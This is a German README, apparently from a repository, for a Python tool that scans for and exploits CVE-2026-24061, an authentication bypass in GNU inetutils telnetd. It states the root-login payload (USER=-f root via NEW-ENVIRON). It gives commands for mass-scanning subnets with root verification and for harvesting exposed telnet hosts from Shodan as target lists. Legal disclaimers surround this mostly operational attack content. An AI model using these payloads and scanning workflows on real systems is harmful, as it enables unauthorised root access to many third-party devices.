
Scannt nach CVE-2026-24061 telnetd Auth-Bypass, generiert Payloads und verifiziert Root-Zugriff auf verwundbare GNU inetutils telnetd-Geräte.
⚠️ SEHR WICHTIGER RECHTLICHER HINWEIS ⚠️
Dieses Tool ist ausschließlich für Bildungszwecke, Sicherheitsforschung, Schwachstellenanalyse und autorisierte Tests bestimmt.
USER=-f root (oder Variationen) über die NEW-ENVIRON-Option ermöglicht sofortigen Login als root ohne Passwort.Dieser Scanner wurde nur dank der hervorragenden technischen Analyse und des Proof of Concept möglich, die vom Team von Hakai Security veröffentlicht wurden.
Deren detaillierter Artikel lieferte die präzisen technischen Grundlagen zum Exploit-Vektor, den echten Payloads und dem Verhalten des verwundbaren telnetd.
→ Lesen Sie die vollständige Analyse hier:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/
Vielen Dank an Hakai Security für die Transparenz, technische Qualität und den Beitrag zur Sicherheits-Community. Sie haben dazu beigetragen, dieses Tool präziser und nützlicher für verantwortungsvolle Forschung zu machen.
--users (Standard umfasst root, admin, pi, ubuntu, debian, etc.)id und whoami (--verify)-w)# Empfohlen: virtualenv verwenden
python3 -m venv venv-cve
source venv-cve/bin/activate
# Abhängigkeiten installieren
pip install telnetlib3 colorama
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# Mit Zielliste (z. B. Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# Fokussiert auf root (schneller)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# Dry-run (listet nur IPs auf)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
pip install shodan
# Mit Ihrem API-Key initialisieren
shodan init SUA_API_KEY_AQUI
# Mögliche Ziele herunterladen
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# IPs extrahieren
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# Scan
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
Pull Requests sind willkommen, solange sie den ethischen Fokus wahren und die Haftungshinweise verstärken. Lizenz MIT-Lizenz – aber ich betone: nicht autorisierte Nutzung liegt in der alleinigen Verantwortung des Benutzers. Erstellt für Studium, Sensibilisierung und Sicherheitsforschung.
⭐ Wenn es nützlich war, geben Sie einen Stern!
🛡️ Verwenden Sie es mit äußerster Verantwortung.
Made with ❤️ by killsystema